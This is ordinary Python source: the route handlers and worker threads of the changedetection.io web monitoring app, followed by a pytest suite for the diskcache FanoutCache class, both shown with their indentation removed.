str_to_dt = datetime.datetime.strptime(limit_date, '%Y/%m/%d %H:%M')
limit_timestamp = int(str_to_dt.timestamp())
if limit_timestamp > time.time():
flash("Timestamp is in the future, cannot continue.", 'error')
return redirect(url_for('scrub_page'))
except ValueError:
flash('Incorrect date format, cannot continue.', 'error')
return redirect(url_for('scrub_page'))
if confirmtext == 'scrub':
changes_removed = 0
for uuid, watch in datastore.data['watching'].items():
if limit_timestamp:
changes_removed += datastore.scrub_watch(uuid, limit_timestamp=limit_timestamp)
else:
changes_removed += datastore.scrub_watch(uuid)
flash("Cleared snapshot history ({} snapshots removed)".format(changes_removed))
else:
flash('Incorrect confirmation text.', 'error')
return redirect(url_for('index'))
output = render_template("scrub.html")
return output
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from changedetectionio import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
# 0 means that theres only one, so that there should be no 'unviewed' history available
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid]['history'].keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid]['history'][newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = html_tools.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
if datastore.data['settings']['application'].get('ignore_whitespace', False):
checksum = hashlib.md5(stripped_content.translate(None, b'\r\n\t ')).hexdigest()
else:
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
@login_required
def edit_page(uuid):
from changedetectionio import forms
form = forms.watchForm(request.form)
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if request.method == 'GET':
if not uuid in datastore.data['watching']:
flash("No watch with the UUID %s found." % (uuid), "error")
return redirect(url_for('index'))
populate_form_from_watch(form, datastore.data['watching'][uuid])
if datastore.data['watching'][uuid]['fetch_backend'] is None:
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
if request.method == 'POST' and form.validate():
# Re #110, if they submit the same as the default value, set it to None, so we continue to follow the default
if form.minutes_between_check.data == datastore.data['settings']['requests']['minutes_between_check']:
form.minutes_between_check.data = None
if form.fetch_backend.data == datastore.data['settings']['application']['fetch_backend']:
form.fetch_backend.data = None
update_obj = {'url': form.url.data.strip(),
'minutes_between_check': form.minutes_between_check.data,
'tag': form.tag.data.strip(),
'title': form.title.data.strip(),
'headers': form.headers.data,
'body': form.body.data,
'method': form.method.data,
'ignore_status_codes': form.ignore_status_codes.data,
'fetch_backend': form.fetch_backend.data,
'trigger_text': form.trigger_text.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
'extract_title_as_title': form.extract_title_as_title.data,
}
# Notification URLs
datastore.data['watching'][uuid]['notification_urls'] = form.notification_urls.data
# Ignore text
form_ignore_text = form.ignore_text.data
datastore.data['watching'][uuid]['ignore_text'] = form_ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form_ignore_text:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid]['css_filter'] = form.css_filter.data.strip()
datastore.data['watching'][uuid]['subtractive_selectors'] = form.subtractive_selectors.data
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form.css_filter.data.strip() != datastore.data['watching'][uuid]['css_filter']:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid].update(update_obj)
flash("Updated watch.")
# Re #286 - We wait for syncing new data to disk in another thread every 60 seconds
# But in the case something is added we should save straight away
datastore.sync_to_json()
# Queue the watch for immediate recheck
update_q.put(uuid)
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': form.url.data.strip(),
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
'uuid': uuid
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
# Diff page [edit] link should go back to diff page
if request.args.get("next") and request.args.get("next") == 'diff' and not form.save_and_preview_button.data:
return redirect(url_for('diff_history_page', uuid=uuid))
else:
if form.save_and_preview_button.data:
flash('You may need to reload this page to see the new content.')
return redirect(url_for('preview_page', uuid=uuid))
else:
return redirect(url_for('index'))
else:
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
# Re #110 offer the default minutes
using_default_minutes = False
if form.minutes_between_check.data == None:
form.minutes_between_check.data = datastore.data['settings']['requests']['minutes_between_check']
using_default_minutes = True
output = render_template("edit.html",
uuid=uuid,
watch=datastore.data['watching'][uuid],
form=form,
using_default_minutes=using_default_minutes,
current_base_url = datastore.data['settings']['application']['base_url']
)
return output
@app.route("/settings", methods=['GET', "POST"])
@login_required
def settings_page():
from changedetectionio import content_fetcher, forms
form = forms.globalSettingsForm(request.form)
if request.method == 'GET':
form.minutes_between_check.data = int(datastore.data['settings']['requests']['minutes_between_check'])
form.notification_urls.data = datastore.data['settings']['application']['notification_urls']
form.global_subtractive_selectors.data = datastore.data['settings']['application']['global_subtractive_selectors']
form.global_ignore_text.data = datastore.data['settings']['application']['global_ignore_text']
form.ignore_whitespace.data = datastore.data['settings']['application']['ignore_whitespace']
form.extract_title_as_title.data = datastore.data['settings']['application']['extract_title_as_title']
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
form.notification_title.data = datastore.data['settings']['application']['notification_title']
form.notification_body.data = datastore.data['settings']['application']['notification_body']
form.notification_format.data = datastore.data['settings']['application']['notification_format']
form.base_url.data = datastore.data['settings']['application']['base_url']
if request.method == 'POST' and form.data.get('removepassword_button') == True:
# Password unset is a GET, but we can lock the session to a salted env password to always need the password
if not os.getenv("SALTED_PASS", False):
datastore.data['settings']['application']['password'] = False
flash("Password protection removed.", 'notice')
flask_login.logout_user()
return redirect(url_for('settings_page'))
if request.method == 'POST' and form.validate():
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['requests']['minutes_between_check'] = form.minutes_between_check.data
datastore.data['settings']['application']['extract_title_as_title'] = form.extract_title_as_title.data
datastore.data['settings']['application']['fetch_backend'] = form.fetch_backend.data
datastore.data['settings']['application']['notification_title'] = form.notification_title.data
datastore.data['settings']['application']['notification_body'] = form.notification_body.data
datastore.data['settings']['application']['notification_format'] = form.notification_format.data
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['application']['base_url'] = form.base_url.data
datastore.data['settings']['application']['global_subtractive_selectors'] = form.global_subtractive_selectors.data
datastore.data['settings']['application']['global_ignore_text'] = form.global_ignore_text.data
datastore.data['settings']['application']['ignore_whitespace'] = form.ignore_whitespace.data
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': "Test from changedetection.io!",
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
if not os.getenv("SALTED_PASS", False) and form.password.encrypted_password:
datastore.data['settings']['application']['password'] = form.password.encrypted_password
flash("Password protection enabled.", 'notice')
flask_login.logout_user()
return redirect(url_for('index'))
datastore.needs_write = True
flash("Settings updated.")
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
output = render_template("settings.html",
form=form,
current_base_url = datastore.data['settings']['application']['base_url'],
hide_remove_pass=os.getenv("SALTED_PASS", False))
return output
@app.route("/import", methods=['GET', "POST"])
@login_required
def import_page():
import validators
remaining_urls = []
good = 0
if request.method == 'POST':
urls = request.values.get('urls').split("\n")
for url in urls:
url = url.strip()
url, *tags = url.split(" ")
# Flask wtform validators wont work with basic auth, use validators package
if len(url) and validators.url(url):
new_uuid = datastore.add_watch(url=url.strip(), tag=" ".join(tags))
# Straight into the queue.
update_q.put(new_uuid)
good += 1
else:
if len(url):
remaining_urls.append(url)
flash("{} Imported, {} Skipped.".format(good, len(remaining_urls)))
if len(remaining_urls) == 0:
# Looking good, redirect to index.
return redirect(url_for('index'))
# Could be some remaining, or we could be on GET
output = render_template("import.html",
remaining="\n".join(remaining_urls)
)
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/api/mark-all-viewed", methods=['GET'])
@login_required
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, watch['newest_history_key'])
flash("Cleared all statuses.")
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
@login_required
def diff_history_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
dates = list(watch['history'].keys())
# Convert to int, sort and back to str again
# @todo replace datastore getter that does this automatically
dates = [int(i) for i in dates]
dates.sort(reverse=True)
dates = [str(i) for i in dates]
if len(dates) < 2:
flash("Not enough saved change detection snapshots to produce a report.", "error")
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, dates[0])
newest_file = watch['history'][dates[0]]
try:
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
except Exception as e:
newest_version_file_contents = "Unable to read {}.\n".format(newest_file)
previous_version = request.args.get('previous_version')
try:
previous_file = watch['history'][previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = watch['history'][dates[1]]
try:
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
except Exception as e:
previous_version_file_contents = "Unable to read {}.\n".format(previous_file)
output = render_template("diff.html", watch_a=watch,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
uuid=uuid,
newest_version_timestamp=dates[0],
current_previous_version=str(previous_version),
current_diff_url=watch['url'],
extra_title=" - Diff - {}".format(watch['title'] if watch['title'] else watch['url']),
left_sticky=True)
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
@login_required
def preview_page(uuid):
content = []
ignored_line_numbers = []
trigger_line_numbers = []
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
if len(watch['history']):
timestamps = sorted(watch['history'].keys(), key=lambda x: int(x))
filename = watch['history'][timestamps[-1]]
try:
with open(filename, 'r') as f:
tmp = f.readlines()
# Get what needs to be highlighted
ignore_rules = watch.get('ignore_text', []) + datastore.data['settings']['application']['global_ignore_text']
# .readlines will keep the \n, but we will parse it here again, in the future tidy this up
ignored_line_numbers = html_tools.strip_ignore_text(content="".join(tmp),
wordlist=ignore_rules,
mode='line numbers'
)
trigger_line_numbers = html_tools.strip_ignore_text(content="".join(tmp),
wordlist=watch['trigger_text'],
mode='line numbers'
)
# Prepare the classes and lines used in the template
i=0
for l in tmp:
classes=[]
i+=1
if i in ignored_line_numbers:
classes.append('ignored')
if i in trigger_line_numbers:
classes.append('triggered')
content.append({'line': l, 'classes': ' '.join(classes)})
except Exception as e:
content.append({'line': "File doesnt exist or unable to read file {}".format(filename), 'classes': ''})
else:
content.append({'line': "No history found", 'classes': ''})
output = render_template("preview.html",
content=content,
extra_stylesheets=extra_stylesheets,
ignored_line_numbers=ignored_line_numbers,
triggered_line_numbers=trigger_line_numbers,
current_diff_url=watch['url'],
watch=watch,
uuid=uuid)
return output
@app.route("/settings/notification-logs", methods=['GET'])
@login_required
def notification_logs():
global notification_debug_log
output = render_template("notification-log.html",
logs=notification_debug_log if len(notification_debug_log) else ["No errors or warnings detected"])
return output
@app.route("/api/<string:uuid>/snapshot/current", methods=['GET'])
@login_required
def api_snapshot(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
try:
watch = datastore.data['watching'][uuid]
except KeyError:
return abort(400, "No history found for the specified link, bad link?")
newest = list(watch['history'].keys())[-1]
with open(watch['history'][newest], 'r') as f:
content = f.read()
resp = make_response(content)
resp.headers['Content-Type'] = 'text/plain'
return resp
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("static/images", path="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
@login_required
def get_backup():
import zipfile
from pathlib import Path
# Remove any existing backup file, for now we just keep one file
for previous_backup_filename in Path(datastore_o.datastore_path).rglob('changedetection-backup-*.zip'):
os.unlink(previous_backup_filename)
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(datastore_o.datastore_path, backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure we're written fresh
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(datastore_o.datastore_path, "url-watches.json"), arcname="url-watches.json")
# Add the flask app secret
zipObj.write(os.path.join(datastore_o.datastore_path, "secret.txt"), arcname="secret.txt")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(datastore_o.datastore_path).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(datastore_o.datastore_path, ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
# Create a list file with just the URLs, so it's easier to port somewhere else in the future
list_file = "url-list.txt"
with open(os.path.join(datastore_o.datastore_path, list_file), "w") as f:
for uuid in datastore.data["watching"]:
url = datastore.data["watching"][uuid]["url"]
f.write("{}\r\n".format(url))
list_with_tags_file = "url-list-with-tags.txt"
with open(
os.path.join(datastore_o.datastore_path, list_with_tags_file), "w"
) as f:
for uuid in datastore.data["watching"]:
url = datastore.data["watching"][uuid]["url"]
tag = datastore.data["watching"][uuid]["tag"]
f.write("{} {}\r\n".format(url, tag))
# Add it to the Zip
zipObj.write(
os.path.join(datastore_o.datastore_path, list_file),
arcname=list_file,
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8,
)
zipObj.write(
os.path.join(datastore_o.datastore_path, list_with_tags_file),
arcname=list_with_tags_file,
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8,
)
# Send_from_directory needs to be the full absolute path
return send_from_directory(os.path.abspath(datastore_o.datastore_path), backupname, as_attachment=True)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
# These files should be in our subdirectory
try:
return send_from_directory("static/{}".format(group), path=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
@login_required
def api_watch_add():
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
if form.validate():
url = request.form.get('url').strip()
if datastore.url_exists(url):
flash('The URL {} already exists'.format(url), "error")
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
# Straight into the queue.
update_q.put(new_uuid)
flash("Watch added.")
return redirect(url_for('index'))
else:
flash("Error")
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
@login_required
def api_delete():
uuid = request.args.get('uuid')
datastore.delete(uuid)
flash('Deleted.')
return redirect(url_for('index'))
@app.route("/api/clone", methods=['GET'])
@login_required
def api_clone():
uuid = request.args.get('uuid')
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
new_uuid = datastore.clone(uuid)
update_q.put(new_uuid)
flash('Cloned.')
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
@login_required
def api_watch_checknow():
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
flash("{} watches are queued for rechecking.".format(i))
return redirect(url_for('index', tag=tag))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
threading.Thread(target=notification_runner).start()
# Check for new release version, but not when running in test/build
if not os.getenv("GITHUB_REF", False):
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': __version__,
'app_guid': datastore.data['app_guid'],
'watch_count': len(datastore.data['watching'])
},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
def notification_runner():
global notification_debug_log
while not app.config.exit.is_set():
try:
# At the moment only one thread runs (single runner)
n_object = notification_q.get(block=False)
except queue.Empty:
time.sleep(1)
else:
# Process notifications
try:
from changedetectionio import notification
notification.process_notification(n_object, datastore)
except Exception as e:
print("Watch URL: {} Error {}".format(n_object['watch_url'], str(e)))
# UUID wont be present when we submit a 'test' from the global settings
if 'uuid' in n_object:
datastore.update_watch(uuid=n_object['uuid'],
update_obj={'last_notification_error': "Notification error detected, please see logs."})
log_lines = str(e).splitlines()
notification_debug_log += log_lines
# Trim the log length
notification_debug_log = notification_debug_log[-100:]
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
from changedetectionio import update_worker
# Spin up Workers that do the fetching
# Can be overriden by ENV or use the default settings
n_workers = int(os.getenv("FETCH_WORKERS", datastore.data['settings']['requests']['workers']))
for _ in range(n_workers):
new_worker = update_worker.update_worker(update_q, notification_q, app, datastore)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
# Get a list of watches by UUID that are currently fetching data
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Re #232 - Deepcopy the data incase it changes while we're iterating through it all
while True:
try:
copied_datastore = deepcopy(datastore)
except RuntimeError as e:
# RuntimeError: dictionary changed size during iteration
time.sleep(0.1)
else:
break
# Re #438 - Don't place more watches in the queue to be checked if the queue is already large
while update_q.qsize() >= 2000:
time.sleep(1)
# Check for watches outside of the time threshold to put in the thread queue.
now = time.time()
max_system_wide = int(copied_datastore.data['settings']['requests']['minutes_between_check']) * 60
for uuid, watch in copied_datastore.data['watching'].items():
# No need todo further processing if it's paused
if watch['paused']:
continue
# If they supplied an individual entry minutes to threshold.
watch_minutes_between_check = watch.get('minutes_between_check', None)
if watch_minutes_between_check is not None:
# Cast to int just incase
max_time = int(watch_minutes_between_check) * 60
else:
# Default system wide.
max_time = max_system_wide
threshold = now - max_time
# Yeah, put it in the queue, it's more than time
if watch['last_checked'] <= threshold:
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Wait a few seconds before checking the list again
time.sleep(3)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
|
test_fanout.py
|
"Test diskcache.fanout.FanoutCache."
import collections as co
import hashlib
import io
import os
import os.path as op
import pickle
import shutil
import subprocess as sp
import tempfile
import threading
import time
import warnings
from unittest import mock
import pytest
import diskcache as dc
warnings.simplefilter('error')
warnings.simplefilter('ignore', category=dc.EmptyDirWarning)
@pytest.fixture
def cache():
with dc.FanoutCache() as cache:
yield cache
shutil.rmtree(cache.directory, ignore_errors=True)
def test_init(cache):
default_settings = dc.DEFAULT_SETTINGS.copy()
del default_settings['size_limit']
for key, value in default_settings.items():
assert getattr(cache, key) == value
assert cache.size_limit == 2 ** 27
cache.check()
for key, value in dc.DEFAULT_SETTINGS.items():
setattr(cache, key, value)
cache.check()
def test_set_get_delete(cache):
for value in range(100):
cache.set(value, value)
cache.check()
for value in range(100):
assert cache.get(value) == value
cache.check()
for value in range(100):
assert value in cache
cache.check()
for value in range(100):
assert cache.delete(value)
assert cache.delete(100) is False
cache.check()
for value in range(100):
cache[value] = value
cache.check()
for value in range(100):
assert cache[value] == value
cache.check()
cache.clear()
assert len(cache) == 0
cache.check()
def test_set_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
set_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.set = set_func
set_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert not cache.set(0, 0)
def test_touch(cache):
assert cache.set(0, None, expire=60)
assert cache.touch(0, expire=None)
assert cache.touch(0, expire=0)
assert not cache.touch(0)
def test_touch_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
touch_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.touch = touch_func
touch_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert not cache.touch(0)
def test_add(cache):
assert cache.add(0, 0)
assert not cache.add(0, 1)
assert cache.get(0) == 0
def test_add_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
add_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.add = add_func
add_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert not cache.add(0, 0)
def stress_add(cache, limit, results):
total = 0
for num in range(limit):
if cache.add(num, num, retry=True):
total += 1
# Stop one thread from running ahead of others.
time.sleep(0.001)
results.append(total)
def test_add_concurrent():
with dc.FanoutCache(shards=1) as cache:
results = co.deque()
limit = 1000
threads = [
threading.Thread(target=stress_add, args=(cache, limit, results))
for _ in range(16)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert sum(results) == limit
cache.check()
shutil.rmtree(cache.directory, ignore_errors=True)
def test_incr(cache):
cache.incr('key', delta=3) == 3
def test_incr_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
incr_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.incr = incr_func
incr_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert cache.incr('key', 1) is None
def test_decr(cache):
cache.decr('key', delta=2) == -2
def test_decr_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
decr_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.decr = decr_func
decr_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert cache.decr('key', 1) is None
def stress_incr(cache, limit):
for _ in range(limit):
cache.incr(b'key', retry=True)
time.sleep(0.001)
def test_incr_concurrent():
with dc.FanoutCache(shards=1, timeout=0.001) as cache:
count = 16
limit = 50
threads = [
threading.Thread(target=stress_incr, args=(cache, limit))
for _ in range(count)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert cache.get(b'key') == count * limit
cache.check()
shutil.rmtree(cache.directory, ignore_errors=True)
def test_getsetdel(cache):
values = [
(None, False),
((None,) * 2 ** 10, False),
(1234, False),
(2 ** 512, False),
(56.78, False),
(u'hello', False),
(u'hello' * 2 ** 10, False),
(b'world', False),
(b'world' * 2 ** 10, False),
(io.BytesIO(b'world' * 2 ** 10), True),
]
for key, (value, file_like) in enumerate(values):
assert cache.set(key, value, read=file_like)
assert len(cache) == len(values)
for key, (value, file_like) in enumerate(values):
if file_like:
assert cache[key] == value.getvalue()
else:
assert cache[key] == value
for key, _ in enumerate(values):
del cache[key]
assert len(cache) == 0
for value, (key, _) in enumerate(values):
cache[key] = value
assert len(cache) == len(values)
for value, (key, _) in enumerate(values):
assert cache[key] == value
for _, (key, _) in enumerate(values):
del cache[key]
assert len(cache) == 0
cache.check()
def test_get_timeout(cache):
cache.set(0, 0)
shards = mock.Mock()
shard = mock.Mock()
get_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.get = get_func
get_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert cache.get(0) is None
def test_pop(cache):
for num in range(100):
cache[num] = num
for num in range(100):
assert cache.pop(num) == num
def test_pop_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
pop_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.pop = pop_func
pop_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert cache.pop(0) is None
def test_delete_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
delete_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.delete = delete_func
delete_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert not cache.delete(0)
def test_delitem(cache):
cache[0] = 0
assert cache[0] == 0
del cache[0]
def test_delitem_keyerror(cache):
with pytest.raises(KeyError):
del cache[0]
def test_tag_index(cache):
assert cache.tag_index == 0
cache.create_tag_index()
assert cache.tag_index == 1
cache.drop_tag_index()
assert cache.tag_index == 0
def test_read(cache):
cache.set(0, b'abcd' * 2 ** 20)
with cache.read(0) as reader:
assert reader is not None
def test_read_keyerror(cache):
with pytest.raises(KeyError):
with cache.read(0):
pass
def test_getitem_keyerror(cache):
with pytest.raises(KeyError):
cache[0]
def test_expire(cache):
cache.reset('cull_limit', 0)
for value in range(100):
cache.set(value, value, expire=1e-9)
assert len(cache) == 100
time.sleep(0.01)
cache.reset('cull_limit', 10)
assert cache.expire() == 100
def test_evict(cache):
colors = ('red', 'blue', 'yellow')
for value in range(90):
assert cache.set(value, value, tag=colors[value % len(colors)])
assert len(cache) == 90
assert cache.evict('red') == 30
assert len(cache) == 60
assert len(cache.check()) == 0
def test_size_limit_with_files(cache):
shards = 8
cache.reset('cull_limit', 0)
size_limit = 30 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'foo' * cache.disk_min_file_size
for key in range(40 * shards):
cache.set(key, value)
assert (cache.volume() // shards) > size_limit
cache.cull()
assert (cache.volume() // shards) <= size_limit
def test_size_limit_with_database(cache):
shards = 8
cache.reset('cull_limit', 0)
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'0123456789' * 10
count = size_limit // (8 + len(value)) * shards
for key in range(count):
cache.set(key, value)
assert (cache.volume() // shards) > size_limit
cache.cull()
assert (cache.volume() // shards) <= size_limit
def test_clear(cache):
for value in range(100):
cache[value] = value
assert len(cache) == 100
assert cache.clear() == 100
assert len(cache) == 0
assert len(cache.check()) == 0
def test_remove_timeout(cache):
shard = mock.Mock()
clear = mock.Mock()
shard.clear = clear
clear.side_effect = [dc.Timeout(2), 3]
with mock.patch.object(cache, '_shards', [shard]):
assert cache.clear() == 5
def test_reset_timeout(cache):
shard = mock.Mock()
reset = mock.Mock()
shard.reset = reset
reset.side_effect = [dc.Timeout, 0]
with mock.patch.object(cache, '_shards', [shard]):
assert cache.reset('blah', 1) == 0
def test_stats(cache):
for value in range(100):
cache[value] = value
assert cache.stats(enable=True) == (0, 0)
for value in range(100):
cache[value]
for value in range(100, 110):
cache.get(value)
assert cache.stats(reset=True) == (100, 10)
assert cache.stats(enable=False) == (0, 0)
for value in range(100):
cache[value]
for value in range(100, 110):
cache.get(value)
assert cache.stats() == (0, 0)
assert len(cache.check()) == 0
def test_volume(cache):
volume = sum(shard.volume() for shard in cache._shards)
assert volume == cache.volume()
def test_iter(cache):
for num in range(100):
cache[num] = num
assert set(cache) == set(range(100))
def test_iter_expire(cache):
"""Test iteration with expiration.
Iteration does not expire keys.
"""
cache.reset('cull_limit', 0)
for num in range(100):
cache.set(num, num, expire=1e-9)
time.sleep(0.1)
assert set(cache) == set(range(100))
cache.expire()
assert set(cache) == set()
def test_reversed(cache):
for num in range(100):
cache[num] = num
reverse = list(reversed(cache))
assert list(cache) == list(reversed(reverse))
def test_pickle(cache):
for num, val in enumerate('abcde'):
cache[val] = num
data = pickle.dumps(cache)
other = pickle.loads(data)
for key in other:
assert other[key] == cache[key]
def test_memoize(cache):
count = 1000
def fibiter(num):
alpha, beta = 0, 1
for _ in range(num):
alpha, beta = beta, alpha + beta
return alpha
@cache.memoize(name='fib')
def fibrec(num):
if num == 0:
return 0
elif num == 1:
return 1
else:
return fibrec(num - 1) + fibrec(num - 2)
cache.stats(enable=True)
for value in range(count):
assert fibrec(value) == fibiter(value)
hits1, misses1 = cache.stats()
for value in range(count):
assert fibrec(value) == fibiter(value)
hits2, misses2 = cache.stats()
assert hits2 == hits1 + count
assert misses2 == misses1
def test_copy():
cache_dir1 = tempfile.mkdtemp()
with dc.FanoutCache(cache_dir1) as cache1:
for count in range(10):
cache1[count] = str(count)
for count in range(10, 20):
cache1[count] = str(count) * int(1e5)
cache_dir2 = tempfile.mkdtemp()
shutil.rmtree(cache_dir2)
shutil.copytree(cache_dir1, cache_dir2)
with dc.FanoutCache(cache_dir2) as cache2:
for count in range(10):
assert cache2[count] == str(count)
for count in range(10, 20):
assert cache2[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
